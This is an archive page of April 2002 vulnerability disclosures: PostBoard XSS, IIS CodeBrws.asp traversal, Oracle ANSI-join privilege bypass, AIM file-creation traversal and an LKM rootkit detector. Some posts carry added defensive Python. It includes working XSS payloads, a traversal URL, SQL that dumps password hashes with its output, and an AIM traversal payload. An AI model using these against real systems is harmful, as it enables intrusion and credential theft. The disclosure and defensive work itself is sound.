Multiple Vulnerabilities in PostBoard

2002-04-17 Thread gcsb

Multiple Vulnerabilities in PostBoard
-------------------------------------

PostBoard is an add-on module for the PostNuke content
management system which implements a forum system. 
The current version of PostBoard is 2.0.1 and can be
found at:
www.nukeaddon.com or ftp.dndresources.com.

I have discovered 3 problems with it, one of which was
originally discovered in another product by someone
else. These all exist in the 2.0/2.0.1 version.

Descriptions


1) bbcode IMG tag cross-site scripting

PostBoard uses the common bbcode markup system which
uses tags similar to html. The [IMG] tag will accept 
any source including javascript. For example:

[IMG]javascript:alert('give me cookies');[/IMG]

The above javascript will execute on the victim's
machine upon viewing a message that contains it.

Solution: Only allow URLs that start with 'http://'


2) Topic title cross-site scripting

When adding a new topic to a forum the user enters a
title for their new topic. The topic title can contain
any valid HTML code including script tags. 
For example you can create a topic with the following
title and the script will execute when someone views 
the list of topics in a forum:

<script>alert('give me cookies');</script>

Solution: Do not allow unsafe HTML in topic titles.
There are functions available to do this in 
the PostNuke API (i.e. pnVarPrepHTMLDisplay).


3) bbcode encoding problems

A recent advisory from Whitecell exposed 
vulnerabilities in phpBB's handling of nested 
bbcode tags which can lead to database 
corruption and high CPU usage.

PostBoard appears to use the same code as phpBB for 
encoding bbcode tags to HTML. It would be fair to 
assume that PostBoard suffers from the same 
problems as phpBB in this regard.

The original advisory by Whitecell can be found here:

http://online.securityfocus.com/archive/1/265798

A solution is provided in the above advisory.

Note: I have not tested this, but as the code in 
PostBoard appears to have been pasted from phpBB it's 
a fairly safe bet the problem exists.

Vendor Status
-------------

Vendor was notified of Whitecell advisory on the 7th
of April.

Vendor was notified of problems 1 & 2 on the 8th of
April.

A reply was received on 9th stating that fixes would 
be available in the next version. No date was given.

I sent the vendor another email on the 13th of April
to follow up on progress as there had been a bug fix
release which did not contain fixes for any of the
above problems.

On the 14th of April someone left a message on the
PostBoard support forum which sounded like someone had
been attacked with one of these problems. He included
some detail as to how it was done. I notified the
vendor that I would be posting an advisory.

On the 16th of April another person reported that
they had had their forums redirected to another
site, probably via the same method (putting a 
javascript redirect into a topic title). Still no
response from vendor.


Workarounds
-----------

The only practical workaround for these problems is to
remove PostBoard from your site, or deny access to it
until a fix is released. Or try and patch it yourself.


Disclaimer
----------

I do not work for, nor am I affiliated with any 
security related organisation, especially any that 
might have the same initials as my nickname/handle :)

Oh - and a big shout out to the NZ2600 crew, hi guys
(and gals)! ;)

Thanks!
gcsb.
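Added example, not PostBoard or PostNuke code: a small Python renderer applying the two fixes the advisory proposes, a scheme allowlist for [IMG] URLs (the "starts with http://" rule, widened to https) and HTML escaping of topic titles, which is the job pnVarPrepHTMLDisplay does in the PostNuke API. Function names are mine.

```python
import html
import re
from urllib.parse import urlsplit

# Only these schemes may appear in an <img src>; javascript:, data:,
# vbscript: and friends never pass (assumption: https is also wanted).
ALLOWED_IMG_SCHEMES = frozenset({"http", "https"})

IMG_TAG = re.compile(r"\[IMG\](.*?)\[/IMG\]", re.IGNORECASE | re.DOTALL)


def escape_html(text):
    """Neutralise every HTML metacharacter, including both quote styles,
    so the result is inert in text content and inside attribute values."""
    return html.escape(text, quote=True)


def render_title(title):
    """Topic titles are plain text: escape, never interpret."""
    return escape_html(title)


def safe_img_url(raw):
    """Return the URL if its scheme is allowed, else None.
    Internal whitespace or control characters are a rejection, not a
    cleanup: browsers ignore them when parsing a scheme, so 'java\\nscript:'
    would otherwise slip past a naive prefix test."""
    raw = raw.strip()
    if any(ch.isspace() or not ch.isprintable() for ch in raw):
        return None
    try:
        parts = urlsplit(raw)
    except ValueError:
        return None
    # scheme-relative (//host) or host-less (http:foo) forms are rejected:
    # an allowlist on the scheme only works when the scheme is really there
    if parts.scheme.lower() not in ALLOWED_IMG_SCHEMES or not parts.netloc:
        return None
    return raw


def render_img(match):
    url = safe_img_url(match.group(1))
    if url is None:
        # keep the rejected tag visible as literal, escaped text
        return escape_html(match.group(0))
    return '<img src="%s" alt="">' % escape_html(url)


def render_post(body):
    """Expand [IMG] tags; everything outside them is escaped text, so raw
    HTML typed into a post is shown, not executed."""
    out, pos = [], 0
    for m in IMG_TAG.finditer(body):
        out.append(escape_html(body[pos:m.start()]))
        out.append(render_img(m))
        pos = m.end()
    out.append(escape_html(body[pos:]))
    return "".join(out)
```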






Snort exploits

2002-04-17 Thread 0xcafebabe


I didn't see it posted to these lists, but yesterday Dug Song quietly released a tool 
on the focus-ids list which totally blindsides Snort - 
http://www.monkey.org/~dugsong/fragroute/index.html. His README.snort file contains 
several fragroute scripts which blindside even the current Snort version in CVS, 
tested on RedHat 7.2. For example, the latest wu-ftpd exploits run through the one-line 
script 'tcp_seg 1 new' don't trigger any Snort alerts at all.
:( :(

Fragroute is a very powerful new tool. Has anyone found other attacks against Snort 
with it, or tried it against any other IDS for that matter?


-=+ 0xCafeBabe +=-








[CERT-intexxia] AOLServer DB Proxy Daemon Format String Vulnerability

2002-04-17 Thread Benoît Roussel



SECURITY ADVISORY                                          INTEXXIA (c)
30 01 2002                                              ID #1052-300102

TITLE   : AOLServer DB Proxy Daemon Format String Vulnerability
CREDITS : Guillaume Pelat found this vulnerability / INTEXXIA



SYSTEM AFFECTED
===============

AOLServer 3.4.2
AOLServer 3.4.1
AOLServer 3.4
AOLServer 3.3.1
AOLServer 3.2.1
AOLServer 3.2
AOLServer 3.1
AOLServer 3.0





DESCRIPTION
===========

The Laboratory  intexxia found  a format string vulnerability in
the AOL Server external database driver proxy daemon API that could lead
to a privilege escalation.





DETAILS
=======

AOL Server provides  an API  to develop external database driver
proxy daemons. Those daemons are linked to a library (libnspd.a).

The Laboratory  intexxia found  a format  string and  a buffer  overflow
vulnerability in  the 'Ns_PdLog'  function of  the  library.  Successful
exploitation of the bug could allow an  attacker to execute code and get
access on the system.

As a result, all  the External Driver Proxy Daemons using the 'Ns_PdLog'
function  with  the  'Error'   or  'Notice'  parameter  are  potentially
vulnerable.





SOLUTION
========

This vulnerability has been  fixed in the current version in CVS
branch  nsd_v3_r3_p0 (post-AOLserver  3.4.2) and  can  be  used  for any
affected version.  The patch  used was  created by  intexxia and  can be
found in  attachment. More  information can  be found  at the  following
URL :

http://cvs.sourceforge.net/cgi-bin/viewcvs.cgi/aolserver/aolserver/nspd/log.c.diff?r1=1.4&r2=1.4.6.1





VENDOR STATUS
=============

14-03-2002 : This bulletin was sent to the development team.
19-03-2002 : The vendor confirmed the vulnerability and fixed it
 in  the  CVS  branch  nsd_v3_r3_p0  (post-AOLserver
 3.4.2).





LEGALS
======

AOL Server is a registered trademark.


Intexxia provides this  information  as a public service and as
is. Intexxia  will not be  held accountable for  any damage or distress
caused by the proper or improper usage of these materials.


(c) intexxia 2002. This  document is property  of intexxia. Feel
free to use and distribute  this material as long as  credit is given to
intexxia and the author.





CONTACT
=======

CERT intexxia  [EMAIL PROTECTED]
INTEXXIA http://www.intexxia.com
171, av. Georges Clemenceau            Standard : +33 1 55 69 49 10
92024 Nanterre Cedex - France          Fax      : +33 1 55 69 78 80






Re: Remote buffer overflow in Webalizer

2002-04-17 Thread Franck Coppola

Here is a patch to fix the vulnerability (tested against webalizer-2.01-06). 

 Franck 

Spybreak writes: 

 Release  : April 15 2002
 Author   : Spybreak ([EMAIL PROTECTED])
 Software : Webalizer
 Version  : 2.01-09, 2.01-06
 URL  : http://www.mrunix.net/webalizer/
 Status   : vendor contacted
 Problems : remote buffer overflow 
 
  
 
 
 --- INTRO --- 
 
 The Webalizer is a web server log file analysis program
 which produces usage statistics in HTML format for
 viewing with a browser.  The results are presented in both
 columnar and  graphical format, which facilitates
 interpretation. 
 
 Webalizer 2.01-06 is a part of the Red Hat Linux 7.2
 distribution, enabled by default and run daily by the cron
 daemon. 
 
 
 --- PROBLEM --- 
 
 The webalizer has the ability to perform reverse DNS lookups.
 This ability is disabled by default, but if enabled, an
 attacker with command over his own DNS service, has the
 ability to gain remote root access to a machine, due to a remote
 buffer overflow in the reverse resolving code. 
 
 
 Public key:
 http://spybreak.host.sk 
 
 





An alternative method to check LKM backdoor/rootkit

2002-04-17 Thread Wang Jian

Hello,

I can't find information about the method I found. If I am wrong, I am
sorry.


PRINCIPLE

An LKM backdoor plays tricks to hide itself, including its running processes, 
loadable kernel module and arbitrary files. It changes the kernel behavior
and hides things.

Because it hides things, it creates a fake view hiding the things the installer
wants to hide. Thus, there are differences between the real view and the fake view.

The differences are that some running processes and files are hidden, or, say,
stealth.

METHODS

The discovery of LKM is important for the game. There are some ways to
do so, such as using LKM against LKM. There are two styles in all ways:

1. Find the differences between the two views;
2. Find the LKM directly;

LKM vs. LKM game involves the 2nd style.


THE ALTERNATIVE METHOD

Our alternative method uses the first style: to find the differences
between the fake view and the real view.

And we focus on the filesystem view. An LKM backdoor is stealth, or it will
be discovered by just scanning the filesystem. So we check if there are
stealth files on the filesystem.

We read the raw disk and traverse the filesystem on disk, bypassing the
live filesystem, and create a real view of the files on disk; then we traverse
the live filesystem to get the fake view. Comparing the two views, we can
find the differences. We will find the stealth files.

The actual code can do the comparison while traversing the filesystem,
to save resources.


PROOF OF CONCEPT

At the end, there is proof of concept code. The code is for Linux and the
ext2/ext3 filesystem. It has been tested on Mandrake and RedHat. Beware,
the code needs e2fsprogs 1.26 or above. A successful compilation on
RedHat involves upgrading e2fsprogs-devel; on Mandrake, you need 
libext2fs2-devel.

The code is used for proof of concept. It is not perfect. For example,
I didn't add the check for files which point to INODE 0; I think leaving
it there can give you some fun playing with debug(e2)fs, and proving it
works :-)

Thanks go to Zhang JiaJun for helping me test this out, so I could
make it somewhat smart when facing adore.

Thanks go to Theodore Ts'o's good libext2fs library (and bad docs),
with which I can write simple code.

We have developed proof of concept code for Solaris/UFS and 
Linux/ReiserFS, but we still have some technical problems. We will
release them when we resolve them.


THE GAME WILL CONTINUE

The method utilizes the raw disk interface, such as /dev/rdsk/c0t0d0s2
or /dev/hda1. An LKM backdoor CAN intercept the interface, though of course
it is rather complex and error prone.


CODE START HERE

/* stealth_file_checker.c
 * 
 * Copyright (C) 2002   Wang Jian, Marsec System Inc.
 *
 * http://www.marsec.net/
 *
 * Concept and Programming:
 *
 * Wang Jian  [EMAIL PROTECTED]
 *
 * Testing and Suggestion:
 *
 * Zhang JiaJun [EMAIL PROTECTED]
 *
 *
 * No Warranty. This code is for educational use only, commercial use is
 * prohibited.
 *
 * This small program demonstrates how to detect stealth files/dirs
 * of lkm on linux ext2/ext3 filesystems.
 *
 * compile: gcc -o sfc main.c -lext2fs
 *
 * NOTE: You need e2fsprogs-1.26 or above to compile
 *
 * usage: run it without args to get hints
 *
 */

#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <dirent.h>
#include <ext2fs/ext2fs.h>


ext2_ino_t   root, cwd;
ext2_filsys  fs;

/* resolve a path on the raw (on-disk) filesystem to its inode number,
 * 0 on failure */
ext2_ino_t string_to_inode(ext2_filsys fs, char *str)
{
    ext2_ino_t  ino;
    int         ret;

    ret = ext2fs_namei(fs, root, cwd, str, &ino);
    if (ret) {
        return 0;
    }
    return ino;
}

/* ext2fs_dir_iterate2() callback: called once per on-disk directory entry,
 * checks whether the live (kernel-mediated) view of the same directory
 * still shows that name */
int list_dir_proc(ext2_ino_t dir,
                  int                    entry,
                  struct ext2_dir_entry *dirent,
                  int                    offset,
                  int                    blocksize,
                  char                  *buf,
                  void                  *private)
{
    char    name[EXT2_NAME_LEN + 1];    /* +1 leaves room for the terminator */
    char    tmp[EXT2_NAME_LEN + 256];
    char    tmppath[EXT2_NAME_LEN + 256];
    int     len;
    char   *path;
    struct stat stat_buf;
    int     flag;

    char   *prefix = (char *)private;

    DIR            *dp;
    struct dirent  *dirp;

    /* low byte of name_len is the name length, high byte the file type */
    len = ((dirent->name_len & 0xFF) < EXT2_NAME_LEN) ?
          (dirent->name_len & 0xFF) : EXT2_NAME_LEN;

    strncpy(name, dirent->name, len);
    name[len] = '\0';

    if (entry == DIRENT_DELETED_FILE) {
        return 0;
    }

    /* path of the containing directory, as recorded on the raw disk */
    ext2fs_get_pathname(fs, dir, 0, &path);
    sprintf(tmp, "%s%s/%s", prefix, path, name);
    sprintf(tmppath, "%s%s", prefix, path);

    /* chdir() then readdir() is for adore LKM, anyway it works
     * for other LKM.
     */
    chdir(tmppath);
    if ((dp = opendir(".")) == NULL) {
        printf("open dir %s error\n", tmppath);
        exit(1);
    }
    /* flag stays 1 if the live filesystem never shows this name: stealth */
    flag = 1;
    while ((dirp = readdir(dp)) != NULL) {
        if (strcmp(dirp->d_name, name) == 0) {
            flag = 0;
            break;
        }
    }
    closedir(dp);

Re: Ability to read buddy list of AIM users

2002-04-17 Thread Eugene Medynskiy

  any OS although I haven't tried Linux and Mac yet.

Under Linux (or any Unix), all AIM clients I've tried (AOL AIM for 
Linux, Everybuddy, GAIM) put your buddy list into your home directory, 
so unless you have world-readable home directories this should not be a 
problem.

-- 
-- Eugene Medynskiy

You can't fight in here, this is the War Room!





Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

2002-04-17 Thread H D Moore

--[ Microsoft IIS 5.0 CodeBrws.asp Source Disclosure

Summary:

Microsoft's IIS 5.0 web server is shipped with a set of
sample files to demonstrate different features of the ASP
language. One of these sample files allows a remote user to
view the source of any file in the web root with the extension
.asp, .inc, .htm, or .html. The IISSamples virtual directory
should not be left on production servers in the first place,
but until now there were no serious[1] vulnerabilities found in
those sample scripts. Microsoft was _not_ contacted about
this, they can read the lists like everyone else. This is an
issue that can be fixed by proper system administration. 

Solution:

Remove the /IISSamples virtual directory using the Internet
Services Manager. If for some reason this is not possible,
removing the following ASP script will fix the problem: 

This path assumes that you installed IIS in c:\inetpub

c:\inetpub\iissamples\sdk\asp\docs\CodeBrws.asp

Details:

The IIS developers actually put some thought into securing
this sample script. Unfortunately for them and their user
base, they didn't take into account the Unicode character
set when checking the path passed to the script.

The function fValidPath in CodeBrws.asp has the following
comment placed above it:

REM **
REM  intended behavior:
REM allow access to only .asp, .htm, .html, .inc files
REM in some directory starting from /IISSAMPLES
REM and without .. in the path
REM **  

The fValidPath function first checks to see if the base
directory starts with /IISSAMPLES, then verifies that the
last characters of the request are one of the allowed
extensions, and finally checks to see if the .. sequence is
anywhere in the string. 

The problem is that .. can be represented a number of other
ways using the Unicode character set. For instance, the
sequence %c0%ae%c0%ae will be decoded as two periods by IIS,
but will not be caught by the InStr(1,strPath,"..",1) code in
the ASP script. So to create a request which passes the input
filters but retrieves the source of default.asp...


/iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp


[1] While all versions of IIS previous to 5.0 had significant problems
with the bundled sample scripts, 5.0 has only had a couple information 
gathering issues to date. Due to the lowered risk, many administrators
have left the iissamples virtual directory mapped on their
production servers.
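Added example, not the CodeBrws.asp code: flawed_valid_path() mirrors the fValidPath logic as described above (prefix, extension and a substring search for ".." on the still-encoded request), lenient_utf8_decode() is a hypothetical stand-in for the tolerant decoder the text attributes to IIS (overlong %c0%ae becomes "."), and safe_path() shows the order a server-side filter must use: decode strictly, normalise, then validate the result.

```python
import posixpath
from urllib.parse import unquote_to_bytes

BASE = "/IISSAMPLES"
ALLOWED_EXT = (".asp", ".htm", ".html", ".inc")
PAYLOAD = "/IISSAMPLES/%c0%ae%c0%ae/default.asp"   # the request from the advisory


def flawed_valid_path(raw):
    """The fValidPath logic as the text describes it, applied to the raw,
    still percent-encoded string: prefix, extension, substring '..'."""
    upper = raw.upper()
    return (upper.startswith(BASE)
            and upper.endswith(tuple(e.upper() for e in ALLOWED_EXT))
            and ".." not in raw)


def lenient_utf8_decode(data):
    """Hypothetical tolerant decoder standing in for IIS's: a two-byte
    sequence is accepted even when the code point fits in one byte, so the
    overlong form 0xC0 0xAE decodes to '.' instead of being rejected."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b < 0x80:
            out.append(chr(b))
            i += 1
        elif 0xC0 <= b < 0xE0 and i + 1 < len(data) and 0x80 <= data[i + 1] < 0xC0:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def resolve_as_iis(raw):
    """The file the server ends up opening once the flawed check has passed:
    percent-decode, lenient UTF-8, then path normalisation."""
    return posixpath.normpath(lenient_utf8_decode(unquote_to_bytes(raw)))


def safe_path(raw):
    """Decode first, validate the decoded and normalised path second.
    Returns the path to serve, or None."""
    try:
        # strict UTF-8: overlong and otherwise invalid sequences raise
        decoded = unquote_to_bytes(raw).decode("utf-8")
    except UnicodeDecodeError:
        return None
    if "\x00" in decoded or "\\" in decoded:    # NUL truncation, Windows separators
        return None
    norm = posixpath.normpath(decoded)
    # after normalisation the path must still sit under the base directory;
    # a surviving '..' component means the request tried to climb above root
    if not norm.upper().startswith(BASE + "/") or ".." in norm.split("/"):
        return None
    if not norm.lower().endswith(ALLOWED_EXT):
        return None
    return norm
```

Checking the encoded string and decoding afterwards is the general shape of this bug; the same applies to double percent-encoding or any other representation the server decodes after the filter has run.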



Mailman/Pipermail private mailing list/local user vulnerability

2002-04-17 Thread H. Peter Anvin

There is a vulnerability in Pipermail (mailing list archiving software 
distributed with and integrated with Mailman), that affects you if you 
have local users on the machine.

If you have (a) private Mailman mailing lists and (b) user
logins on the same machine, any local user can read the archives of
those private mailing lists.

The Mailman people have apparently declined to fix this bug.  Therefore 
  I wanted to report it here so people are at the very least aware.

Attached is my bug report and their response.

-hpa


  Bugs item #474616, was opened at 2001-10-24 16:35
  You can respond by visiting:
  
http://sourceforge.net/tracker/?func=detail&atid=100103&aid=474616&group_id=103
 
  Category: Pipermail
  Group: None
 
 Status: Closed
 Resolution: Wont Fix
 
  Priority: 8
  Submitted By: H. Peter Anvin (hpa)
  Assigned to: Nobody/Anonymous (nobody)
  Summary: SECURITY: Pipermail permissions problem
 
  Initial Comment:
  $mailman_root/archive/private is o+x in the default
  installation.  This allows anyone with local access to
  the machine to read the archives of private mailing
  lists, as long as they know the (trivial) structure of
  the files beneath this directory.
 
  I have verified that changing this directory to o-x
  causes *all* pipermail pages to become inaccessible, so
  that does not resolve the problem.
 
  There presumably needs to be a setgid program involved
  which can verify that the user is authenticated and
  give access to the archives if appropriate; then that
  directory can be made o-x.
 
 
 
  --
 
 
 Comment By: Barry Warsaw (bwarsaw)
 
  Date: 2002-04-11 18:40
 
  Message:
  Logged In: YES
  user_id=12800
 
  I'm not inclined to fix this, since this arrangement is
  crucial to the web security of private archives.  Since
  Mailman is usually run on mail and/or web servers that have
  very limited access anyway, I don't consider this an
  important vulnerability.
 
 
  --
 
  You can respond by visiting:
  
http://sourceforge.net/tracker/?func=detail&atid=100103&aid=474616&group_id=103





Re: ansi outer join syntax in Oracle allows access to any data

2002-04-17 Thread Pete Finnigan

Hi Charles

The point is that I can see the dba_users view owned by SYS as a user
with only CREATE SESSION privilege. This is only possible because of the
bug in the ANSI outer join syntax. This bug allows access to any table
without any granted privileges to any user!

The example you show below doesn't show which user you are logged in as
or what privileges that user has. I assume its a user that is either a
DBA or has select privileges on the catalog or SELECT ANY TABLE or
select explicitly on that view.

Try the exact SQL i showed and check for yourself that it doesn't work
in 8.1.6. but will work in 9.0.1

cheers

Pete

In article [EMAIL PROTECTED], Charles J
Wertz [EMAIL PROTECTED] writes
You don't need 9i or ansi syntax.

Connected to:
Oracle8i Enterprise Edition Release 8.1.6.0.0 - Production
With the Partitioning option
JServer Release 8.1.6.0.0 - Production

SQL> set serveroutput on size 100
SQL> sta users
SQL> select username, user_id, password from sys.dba_users
  2  /

..
USERNAME                          USER_ID PASSWORD
------------------------------ ---------- ------------------------------
GABRMJ21                              206 A08F7F24DCD35845
ABDUSM62                              204 25F6BFBE9888CB23
CLARVL18                              205 E45523E8504F938E
SYMEJM94                              195 BF1A81C928566EEE
COSAL75                               118 4EDA8C950487B16F
CONNTS37                              117 B3EB3D464F64E317
ANASD51                               111 AC5DE6711420E91E
FEDEJB07                              224 5111DAC3006F6D81
DELLJM28                              223 FC707A68849F1C3F
CARTKR33                              222 2002A82D0DB2DB19
BRANLD12                              221 9857842415FF35B5
...

I haven't checked this out.
I take it these are encrypted passwords ??

cjw

At 04:24 PM 4/16/2002 +0100, Pete Finnigan wrote:
Hi all

I thought this list may be interested in this issue, apologies if its
known here already.

Oracle 9i includes the new ANSI outer join syntax. Oracle still supports
the old syntax but in the new syntax there is a serious security issue
that allows any user to view any data.

here is an example:

SQL*Plus: Release 9.0.1.0.1 - Production on Tue Apr 16 15:16:45 2

(c) Copyright 2001 Oracle Corporation.  All rights reserved.


Connected to:
Oracle9i Enterprise Edition Release 9.0.1.1.1 - Production
With the Partitioning option
JServer Release 9.0.1.1.1 - Production

SQL> connect / as sysdba
Connected.
SQL> CREATE USER us1 IDENTIFIED BY us11;

User created.

SQL> Grant Create Session to us1;

Grant succeeded.

SQL> connect us1/us11;
Connected.
SQL> select a.username, a.password
   2  from sys.dba_users a left outer join sys.dba_users b on
   3  b.username = a.username
   4  ;

USERNAME                       PASSWORD
------------------------------ ------------------------------
SYS                            D4C5016086B2DC6A
SYSTEM                         D4DF7931AB130E37
DBSNMP                         E066D214D5421CCC
AURORA$JIS$UTILITY$            INVALID_ENCRYPTED_PASSWORD
OSE$HTTP$ADMIN                 INVALID_ENCRYPTED_PASSWORD
AURORA$ORB$UNAUTHENTICATED     INVALID_ENCRYPTED_PASSWORD
SCOTT                          F894844C34402B67
US1                            491AB9AB94D8A9EF
OUTLN                          4A3BA55E08595C81
ORDSYS                         7EFA02EC7EA6B86F
OLAPSVR                        AF52CFD036E8F425

USERNAME                       PASSWORD
------------------------------ ------------------------------
OLAPSYS                        3FB8EF9DB538647C
ORDPLUGINS                     88A2B2C183431F00
MDSYS                          72979A94BAD2AF80
CTXSYS                         71E687F036AD56E5
WKSYS                          69ED49EE1851900D
OLAPDBA                        1AF71599EDACFB00
QS_CBADM                       7C632AFB71F8D305
QS_ADM                         991CDDAD5C5C32CA
QS                             8B09C6075BDF2DC4
QS_WS                          24ACF617DD7D8F2F
HR                             6399F3B38EDF3288

USERNAME                       PASSWORD
------------------------------ ------------------------------
OE                             9C30855E7E0CB02D
PM                             72E382A52E89575A
SH                             9793B3777CD3BD1A
QS_ES                          E6A6FA4BB042E3C2
QS_OS                          FF09F3EB14AE5C26
RMAN                           E7B5D92911C831E1
QS_CB                          CF9CFACF5AE24964
QS_CS                          91A00922D8C0F146

30 rows selected.

SQL>

This shows that a user with the barest of privileges, i.e. CREATE
SESSION can actually see data in the data dictionary that should not be
seen. In this example we can select the list of usernames and their
hashes.

I wanted to bring this issue to the security community as its doing the
rounds on the oracle server newsgroup. Oracle are already aware of this
as there is a bug to 

AIM's 'Direct Connection' feature could lead to arbitrary file creation

2002-04-17 Thread Noah Johnson



AIM's 'Direct Connection' feature could lead to arbitrary file creation
-----------------------------------------------------------------------
Author: Noah Johnson ( [EMAIL PROTECTED] )

Affected versions: 
 All versions of AOL Instant Messenger (up to 
4.8 beta) on all platforms of Windows (as far as I can 
tell).

Preface:
AOL may have patched their servers to prevent 
the wave of DoS attacks recently discovered, but this 
bug - related to the 'Direct Connection' feature - 
cannot be filtered through the server itself, and 
therefore requires a new release to be patched. 
Because direct connections (almost always) 
require user approval, the severity of this bug is 
somewhat smaller than others recently discovered, 
however exploitation is fairly simple and could result 
in anywhere from arbitrary script execution to 
overwriting of critical files, and so I think it's still 
worthy of being noted and fixed soon.

Summary:
  The problem arises in AIM's handling of 
embedded objects during direct connections with 
other users. These 'direct connections' supposedly 
make it easier for users to share multimedia with 
each other during conversations. When a direct 
connection is to be made, the initiating side acts as a 
server - on port 4443 - for the recipient's client to 
connect to (if the request is accepted, of course). 
After this connection is made, all activity between the 
two users is passed through it, relieving the AIM 
server of its job for the time being.
 When a user sends a picture or a sound to his 
buddy, an IMG tag is appropriately inserted into the 
conversation source, while that file's data lies in a 
separate DATA tag immediately proceeding the 
HTML (see below). The client responds to this IMG 
tag either by displaying the picture in the conversation 
or by displaying an icon of the MIME/file-type that has 
been sent. Along with the standard parameters of this 
IMG tag (HEIGHT, WIDTH, DATASIZE, ID, etc...), 
the client also specifies the name and path of the 
original file that was sent. This information is included 
in the SRC parameter, and is the one of importance 
here. The client uses this information in a few ways - 
including the default filename suggested when the 
user opts to save whatever the hell was sent.
So, why does anyone care?
   One last nifty feature I forgot to mention... When 
the client parses the file and recognizes it as a 
RIFF/WAVE type, it will play that file instantly via 
the 'SndPlaySoundEx' API function. Instead of playing 
the buffer directly from memory however, it is instead 
downloaded into the Windows 'temp' directory and 
read from there. But for some odd reason, THE 
ORIGINAL FILENAME IS USED FOR THIS 
TEMPORARY FILE! (Can you see where this is 
heading??)
With very trivial parsing of this SRC parameter, 
AIM is left wide open to the old (..\..) directory 
traversal attack. So now we can choose ANY path on 
our buddy's system to save our file to simply by 
appropriately sculpting the SRC information. Here's 
an example of what might be sent from the direct 
connection:

... 
Data Headers (explained later)
<HTML><BODY>Hey, what's up?<IMG 
SRC="\..\system\johnny.important_file" HEIGHT=0 
WIDTH=0 DATASIZE=50 
ID=1></BODY></HTML><BINARY><DATA 
ID=1>***WAVE FILE DATA 
HERE***</DATA></BINARY>
...

   Assuming that the temp directory on Johnny's 
computer is [c:\windows\temp], this would 
write/overwrite whatever file was thus specified. No 
obvious signs of this would be noted, as the WAVE 
icon would never show up in Johnny's box (notice the 
HEIGHT and WIDTH values).

Fooling the Client:
As noted earlier, AIM only saves this (semi-)
temporary file when it identifies it as valid RIFF/WAVE 
data and tries to play it. So what good is this if we can 
only write WAVE files? (HOLY SHIT! YOU MEAN 
WE CAN OVERWRITE THEIR AIM SOUNDS?!)
Unfortunately for Johnny, the client only looks at the 
first 12 bytes before concluding it is indeed a valid 
sound file. These bytes ideally look like this (see 
wave file specifications):

Offset   Data
0,1,2,3  ASCII 'RIFF'
4,5,6,7  DWORD Wave File Size (can be anything, we don't care;
         neither does the client.)
8,9,A,B  ASCII 'WAVE'

  Keeping this as a base, we can then sculpt any 
file we want (sample exploits next). As long as these 
12 bytes are respected (actually, only the ASCII parts 
of them really matter), the file is saved. 
  The fact that the header is already determined 
severely limits the danger of this bug (we cannot, for 
example, create an executable file). There are a few 
ways around this...

Exploiting:
   Besides the potential of overwriting files, there 
are plenty of file types that can be bullshitted in the 
first 12 bytes without losing functionality of the entire 
thing (think scripts, 
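Added example, not AIM code, from the defender's side of the two weaknesses described above: header_only_is_wave() is the 12-byte test the post describes, parse_riff_wave() is the structural check a client should run instead, and display_name()/stage_sound() show the peer-supplied SRC reduced to a display string while the temporary file gets a name the client chose itself. The WAVE builder and the sample inputs in demo() are constructed for this example.

```python
import os
import shutil
import struct
import tempfile


def header_only_is_wave(data):
    """The 12-byte test the text describes: 'RIFF', any size, 'WAVE'."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"WAVE"


def parse_riff_wave(data):
    """Structural check: the declared RIFF size must match the data, every
    chunk must lie inside it, and a plausible 'fmt ' chunk plus a 'data'
    chunk must exist. Returns the chunk table, or None."""
    if not header_only_is_wave(data):
        return None
    riff_size = struct.unpack_from("<I", data, 4)[0]
    if riff_size + 8 != len(data):
        return None
    chunks, pos = {}, 12
    while pos + 8 <= len(data):
        cid = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        body = pos + 8
        if body + size > len(data):
            return None
        chunks[cid] = data[body:body + size]
        pos = body + size + (size & 1)          # chunks are word-aligned
    fmt = chunks.get(b"fmt ")
    if fmt is None or len(fmt) < 16 or b"data" not in chunks:
        return None
    channels, rate = struct.unpack_from("<HI", fmt, 2)
    if channels == 0 or rate == 0:              # junk posing as a fmt chunk
        return None
    return chunks


def display_name(src):
    """Reduce a peer-supplied SRC to a bare name for display only: drop every
    directory component in either separator style, refuse '', '.' and '..'.
    This string is never used to build a filesystem path."""
    name = src.replace("\\", "/").rsplit("/", 1)[-1]
    return name if name not in ("", ".", "..") else "attachment"


def stage_sound(payload, tmpdir):
    """Write an accepted sound to a temp file named by us, never by the
    peer; returns the path, or None when the payload is not a WAVE."""
    if parse_riff_wave(payload) is None:
        return None
    fd, path = tempfile.mkstemp(prefix="aim_", suffix=".wav", dir=tmpdir)
    with os.fdopen(fd, "wb") as fh:
        fh.write(payload)
    return path


def build_wave(samples, channels=1, rate=8000, bits=8):
    """Constructed minimal PCM WAVE, used as the genuine sample in demo()."""
    fmt = struct.pack("<HHIIHH", 1, channels, rate,
                      rate * channels * bits // 8, channels * bits // 8, bits)
    body = (b"WAVE" + b"fmt " + struct.pack("<I", len(fmt)) + fmt
            + b"data" + struct.pack("<I", len(samples)) + samples
            + (b"\0" if len(samples) & 1 else b""))
    return b"RIFF" + struct.pack("<I", len(body)) + body


def demo():
    """Constructed inputs: the SRC from the post, a genuine WAVE, and a file
    carrying only the 12 magic bytes in front of non-audio text."""
    src = r"\..\system\johnny.important_file"
    real = build_wave(bytes(range(16)))
    tail = b"WAVE" + b"this is not audio data at all"
    disguised = b"RIFF" + struct.pack("<I", len(tail)) + tail
    tmpdir = tempfile.mkdtemp()
    try:
        staged = stage_sound(real, tmpdir)
        return {
            "display_name": display_name(src),
            "real_passes_both": header_only_is_wave(real) and parse_riff_wave(real) is not None,
            "disguised_passes_12_byte_check": header_only_is_wave(disguised),
            "disguised_passes_structural_check": parse_riff_wave(disguised) is not None,
            "staged_in_tmpdir": staged is not None and os.path.dirname(staged) == tmpdir,
            "disguised_staged": stage_sound(disguised, tmpdir) is not None,
        }
    finally:
        shutil.rmtree(tmpdir)
```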

[SNS Advisory No.51] Compaq Tru64 UNIX libc Buffer Overflow Vulnerability

2002-04-17 Thread [EMAIL PROTECTED]

--
SNS Advisory No.51
